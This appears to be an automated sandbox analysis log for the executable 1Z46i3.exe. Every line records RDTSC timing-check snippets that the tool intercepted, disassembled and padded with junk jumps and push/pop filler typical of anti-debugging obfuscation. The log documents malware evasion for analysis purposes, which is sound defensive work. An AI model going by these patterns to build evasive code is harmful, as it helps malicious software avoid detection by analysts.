Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 107EED3 second address: 107EF2B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4E3CF48086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D373Dh], esi 0x00000014 push dword ptr [ebp+122D3834h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F4E3CF48088h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 push edi 0x00000035 jo 00007F4E3CF4808Ch 0x0000003b xor dword ptr [ebp+12464C55h], edx 0x00000041 pop edx 0x00000042 mov dx, 6D00h 0x00000046 push DA694367h 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e jp 00007F4E3CF48086h 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1081CFE second address: 1081D17 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4E3C536586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4E3C53658Fh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1081D17 second address: 1081D2F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4E3CF4808Eh 0x00000008 jo 00007F4E3CF48092h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 1081D2F second address: 1081D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C06DC second address: 50C06E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C06E2 second address: 50C06E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C06E6 second address: 50C06EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C06EA second address: 50C0747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e call 00007F4E3C536592h 0x00000013 mov esi, 45A2BB21h 0x00000018 pop eax 0x00000019 popad 0x0000001a mov dword ptr [esp], ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F4E3C536596h 0x00000026 jmp 00007F4E3C536595h 0x0000002b popfd 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C0747 second address: 50C076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48097h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C076A second address: 50C0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536593h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E3C536595h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080E5E second address: 5080EC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, F7h 0x0000000d pushfd 0x0000000e jmp 00007F4E3CF48099h 0x00000013 and ax, 6056h 0x00000018 jmp 00007F4E3CF48091h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007F4E3CF48093h 0x00000029 pop eax 0x0000002a mov eax, ebx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0986 second address: 50D09B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E3C53658Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D09B2 second address: 50D09B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D09B8 second address: 50D09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D09BC second address: 50D09E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop esi 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov al, AFh 0x00000014 jmp 00007F4E3CF48091h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D09E2 second address: 50D09E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D09E8 second address: 50D09EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5040A29 second address: 5040A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4E3C536591h 0x00000009 add esi, 0C0BB3C6h 0x0000000f jmp 00007F4E3C536591h 0x00000014 popfd 0x00000015 mov cx, E877h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push dword ptr [ebp+04h] 0x0000001f jmp 00007F4E3C53658Ah 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5040A73 second address: 5040A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5040A77 second address: 5040A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080BA9 second address: 5080BE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 pushfd 0x00000007 jmp 00007F4E3CF48094h 0x0000000c adc al, FFFFFFF8h 0x0000000f jmp 00007F4E3CF4808Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, cx 0x0000001f push eax 0x00000020 pop ebx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070A38 second address: 5070A3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070A3E second address: 5070AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov eax, 10172AC5h 0x00000011 pushfd 0x00000012 jmp 00007F4E3CF48092h 0x00000017 xor si, 1458h 0x0000001c jmp 00007F4E3CF4808Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F4E3CF4808Fh 0x0000002b adc cl, 0000001Eh 0x0000002e jmp 00007F4E3CF48099h 0x00000033 popfd 0x00000034 movzx eax, dx 0x00000037 popad 0x00000038 xchg eax, ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070AAE second address: 5070AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536590h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070AC2 second address: 5070AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4E3CF48095h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D00D3 second address: 50D00FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push eax 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4E3C536599h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D00FA second address: 50D0116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, 47h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0116 second address: 50D011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D011C second address: 50D0142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov dx, ax 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 jmp 00007F4E3CF4808Ah 0x00000015 popad 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0008 second address: 50D000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D000C second address: 50D0027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48097h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C0E11 second address: 50C0E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C0E15 second address: 50C0E1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C0E1B second address: 50C0E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C0E21 second address: 50C0E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4E3CF48097h 0x00000011 sub ah, 0000007Eh 0x00000014 jmp 00007F4E3CF48099h 0x00000019 popfd 0x0000001a mov ch, 56h 0x0000001c popad 0x0000001d pop ebp 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007F4E3CF4808Fh 0x00000027 sub ch, FFFFFF8Eh 0x0000002a jmp 00007F4E3CF48099h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080C2E second address: 5080C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080C34 second address: 5080C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080C38 second address: 5080C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bl, al 0x0000000c mov cl, bl 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4E3C53658Ah 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080C54 second address: 5080C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3CF4808Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080C66 second address: 5080C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, bh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0487 second address: 50D0509 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4E3CF4808Fh 0x00000009 and esi, 411C9B7Eh 0x0000000f jmp 00007F4E3CF48099h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F4E3CF48097h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F4E3CF48096h 0x00000026 mov ebp, esp 0x00000028 jmp 00007F4E3CF48090h 0x0000002d mov eax, dword ptr [ebp+08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0509 second address: 50D050D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D050D second address: 50D0513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0513 second address: 50D0534 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0534 second address: 50D0538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0538 second address: 50D053C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D053C second address: 50D0542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0542 second address: 50D0548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D0548 second address: 50D0576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c jmp 00007F4E3CF4808Ah 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F4E3CF4808Dh 0x0000001a pop ecx 0x0000001b mov ebx, 48F543A4h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50709EA second address: 50709F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50709F0 second address: 50709F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50709F6 second address: 50709FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50709FA second address: 50709FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C07C2 second address: 50C07C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C07C6 second address: 50C07CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C07CC second address: 50C082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov bl, A5h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4E3C536594h 0x00000011 push eax 0x00000012 jmp 00007F4E3C53658Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 movzx ecx, dx 0x0000001c pushfd 0x0000001d jmp 00007F4E3C536591h 0x00000022 add ecx, 33260CE6h 0x00000028 jmp 00007F4E3C536591h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C082D second address: 50C0855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 53861888h 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4E3CF48099h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50C0855 second address: 50C085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D02C4 second address: 50D02CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D02CA second address: 50D02CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D02CE second address: 50D02EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50D02EF second address: 50D02F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50B009C second address: 50B00BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov al, bh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50B00BD second address: 50B00C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090B02 second address: 5090B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3CF48094h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090B1A second address: 5090B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4E3C536594h 0x00000013 sbb ch, 00000018h 0x00000016 jmp 00007F4E3C53658Bh 0x0000001b popfd 0x0000001c movzx ecx, bx 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007F4E3C536590h 0x00000027 movzx eax, bx 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4E3C53658Fh 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090B7F second address: 5090B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090B85 second address: 5090BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090BA5 second address: 5090BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090BAB second address: 5090BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F4E3C536590h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4E3C536597h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090BF2 second address: 5090C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5090C16 second address: 5090C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050008 second address: 505000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 505000C second address: 5050012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
